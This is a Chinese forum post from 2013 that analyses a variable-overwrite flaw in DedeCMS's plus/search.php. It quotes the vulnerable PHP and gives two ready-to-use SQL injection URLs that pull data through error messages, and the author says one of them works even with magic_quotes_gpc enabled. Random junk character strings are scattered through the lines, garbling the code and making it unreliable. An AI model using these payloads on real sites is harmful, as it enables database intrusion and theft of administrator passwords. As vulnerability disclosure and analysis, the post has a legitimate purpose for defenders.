微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
/ w3 O- }4 z/ B$ g3 V2 D作者: c4rp3nt3r@0x50sec.org2 o' v4 L8 q" A |) n
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.- C7 c2 l1 x5 T. F5 o! Z5 m
3 _$ L% Z0 Z& F2 U黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.% w9 b L! O; _" l% c
8 ^; N& [' T/ V! P- _6 ]3 V+ c5 O============
) I+ Q' s2 J2 k+ `* ^
% ^/ J+ u3 i/ ?4 }3 g5 z a( O5 k0 @) I/ v e
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
m. ?4 `* O# r* a3 V0 M ! B5 Y+ |. l. _) b( f
require_once(dirname(__FILE__).”/../include/common.inc.php”);9 X" N2 D6 b1 {7 S: E
require_once(DEDEINC.”/arc.searchview.class.php”);
! C6 F) _% [# s/ P4 c2 ~* h ) J Y. G0 I" l
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;2 P# D: p7 J; q. W1 P
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;/ `5 q+ r- p- t
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
9 V* D. B7 {% B+ |$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
% A$ l0 |5 W& ?$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;, q* H! X$ u; k) d
) M& M2 h: V5 H" o
if(!isset($orderby)) $orderby=”;
P5 x8 y7 m0 L! |: `8 O* G3 ~& _; _else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);# p/ U4 U* K- x
1 |+ S. k F8 Y! }
$ _6 w6 W! R9 [. X4 s9 `if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
; I4 O& v; G: X$ v' s Welse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
' L& f1 n1 e% J8 U+ Q" {, F
2 w; v9 R' P, ^6 cif(!isset($keyword)){2 u p/ g, g6 N9 A
if(!isset($q)) $q = ”;
/ F1 ~8 D/ U9 c9 b. q/ ~ $keyword=$q;1 r) S5 Q4 _9 O* s
}6 e1 z" U _( V5 l8 C; K
6 e( ^* N& ^+ d5 k$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
1 J) I k& p1 Q3 X8 L h 4 C S- b9 o4 J N
//查找栏目信息. n3 @, H, V! {' L
if(empty($typeid))
T! W# C1 S: E% ]8 D( t{, F ]# q+ J6 U2 Q0 z$ f
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
( V% k6 D9 B/ a! [, J if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
9 u% r* |2 k) ~. y8 B$ U* m {
0 V( M3 H2 o8 U! D $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
5 C) J* r& @# k4 a: H0 K fwrite($fp, “<”.”?php\r\n”);) S% j. ]# d, }- T$ W# }
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);( X2 J7 g: d7 G- u
$dsql->Execute();
0 t2 j9 H( Z ` while($row = $dsql->GetArray())
) _/ G$ u3 g' U$ s$ ~/ p {
5 F4 O# J4 Y" a7 `! l% l6 z fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”); { b, M$ W4 o
}6 [1 d3 k% x" u
fwrite($fp, ‘?’.'>’);
6 ]/ C- a: q b- Q fclose($fp);
" d Z- u$ l+ Z: N9 a) H/ l2 T5 K }0 u$ V% W" T! `8 h7 }
//引入栏目缓存并看关键字是否有相关栏目内容
) N2 P2 V9 B; V* A require_once($typenameCacheFile);
7 \5 v$ v2 I- O8 _2 K//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
; ^& `1 j. Z( [$ e: X" P* g//5 A+ f9 a) m1 E# h' w- n
if(isset($typeArr) && is_array($typeArr))( C# L+ ?2 S4 ]+ Q0 k
{" S9 J5 }1 L c! F! l( u N6 y
foreach($typeArr as $id=>$typename)
! [& k% P) P3 Z+ T8 g: m {
2 _: b1 E4 f3 c7 c
6 i- a) \( t6 M0 m+ x7 I1 _ <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
6 N* p+ I- [/ o( H y* \ if($keyword != $keywordn)% W) Y/ N1 ]+ U+ c: w% H" L; a6 d4 u
{( A1 ^0 I3 @8 ~/ `) g
$keyword = $keywordn;3 G5 n% D; n6 a. t1 W W
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设5 F' I5 N3 |# h5 n
break;2 E$ D. l7 @; Z- ^5 _7 ]% I
}
$ P+ M1 `. Q) U/ L6 t4 p }2 b6 I! F5 |# K4 C: K* `
}
) n5 b, f2 m% g$ U}
5 Q# o! g( {, C; U0 j# \然后plus/search.php文件下面定义了一个 Search类的对象 .* y2 N6 `) }) ?6 M) ?8 n
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.7 B$ h+ E1 w" r0 k) G
$this->TypeLink = new TypeLink($typeid);" i) O2 q2 X+ f( g" U& U
7 M ^# T/ o2 n; K6 J: `TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句., [' U- e$ N. l5 A1 R
1 o( D( Q; I; C: ]4 N* P$ g L
class TypeLink
7 Q5 p: v+ `+ `{
8 H X0 A& p$ L$ y var $typeDir;
( j& R/ K' G3 k5 S; g' K var $dsql;$ D' t4 F, b, _# A) l
var $TypeID;* i3 U# d. V4 ~1 I4 j" G
var $baseDir;7 Q, y' r+ x0 j* V: G v8 h3 m# O5 }
var $modDir;" Z- R8 v+ Y9 y( H
var $indexUrl;& T2 k* s0 |- p
var $indexName;' s8 E3 u; c; Z5 w: ]1 w& U* s6 @4 i3 b
var $TypeInfos;% c7 `2 {0 v: I! z
var $SplitSymbol;$ i8 K7 U, W9 R' j
var $valuePosition;
7 k1 H* B& n5 ?6 q: S+ | p var $valuePositionName;
' j6 M z; A0 s var $OptionArrayList;//构造函数///////
, k x/ L) c/ A) v //php5构造函数" d* M. y0 p. d* b8 U# Q
function __construct($typeid)" B0 O6 h( s" i; K/ t: p# C' }0 k
{
) f) F! [2 W1 U2 L $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
8 h5 o5 d: C/ p: }. E $this->indexName = $GLOBALS['cfg_indexname'];# ^: g' Q' b4 A; x9 K0 g& {; I3 S
$this->baseDir = $GLOBALS['cfg_basedir'];+ Y H. E$ X: |- |5 m& u! K
$this->modDir = $GLOBALS['cfg_templets_dir'];
$ p, M. @; n: S0 s& P0 G2 O- Q0 h $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
2 q9 g- p; A$ c5 k% h0 A) ~0 G $this->dsql = $GLOBALS['dsql'];
& L7 @3 Z/ [6 P* I $this->TypeID = $typeid;
, y" W/ L. ?+ _1 e; c/ U $this->valuePosition = ”;* b& ^3 z0 n& \
$this->valuePositionName = ”;3 i' y m+ r. X( q9 z
$this->typeDir = ”;6 M& o, Y9 t" J% @% A- Y c( [
$this->OptionArrayList = ”;8 L1 I; y }2 e
; k* x& R5 L( U9 X& t! a ^) I
//载入类目信息
4 H7 O9 s5 l2 ~ S( H
4 y& M, k; r0 z' L( [: Z* S8 Y L <font color=”Red”>$query = “SELECT tp.*,ch.typename as
7 M, c1 [% b9 I3 qctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
0 }- m0 H8 T9 A$ Q8 J0 R- t1 e`#@__channeltype` ch
: H9 y# b. o; x! b on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
# `5 t9 ~7 j* S# \
8 E: [# x6 w6 j, |3 ` if($typeid > 0): y( ^- f$ l% I0 Y
{2 ?5 W" t( n' E9 b% J* J
$this->TypeInfos = $this->dsql->GetOne($query);! Y0 F0 _- i; U# U- s
利用代码一 需要 即使magic_quotes_gpc = Off
/ c! R# m9 f0 w2 s- C3 V. j
. h: y& W. B4 v: v2 Jwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
7 A5 E: d2 ?2 K* N* N/ @! m6 D
+ Z4 ^5 v7 V2 ]; i这只是其中一个利用代码… Search 类的构造函数再往下/ H/ {' @( Y* j# a4 a
, k1 `, W6 Q; |
……省略" E. z% M9 `! L
$this->TypeID = $typeid;- O/ T3 `) e; X2 Q. I- v$ }0 k
……省略
/ k) Z, w6 e, |! v$ t+ wif($this->TypeID==”0″){' a# i- h) j' t+ e( ^9 t& `; P6 J/ s
$this->ChannelTypeid=1;0 l: ?8 A& G/ d- {
}else{
: R. ?8 w9 T! K $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
" N3 T8 ]+ [, d3 S1 m {//现在不鸡肋了吧亲…. P: ?( P8 F% i5 {' Q# W
$this->ChannelTypeid=$row['channeltype'];+ l5 Y4 a5 g: Z! p/ ?
) q4 E6 c& ~0 M0 r+ D9 [% q }
, i. ?8 k) | a' G5 Z; w1 }利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
, I+ }: ]' K( B6 C" d a% L h5 d
: P# l% e0 D! twww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
7 i% [$ E, r/ ?0 P # D3 N; B' v5 B- `% [
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
7 [/ U) m" U8 s S& j* f0 y |
发表于 2013-1-19 08:18:56
收藏
支持
反对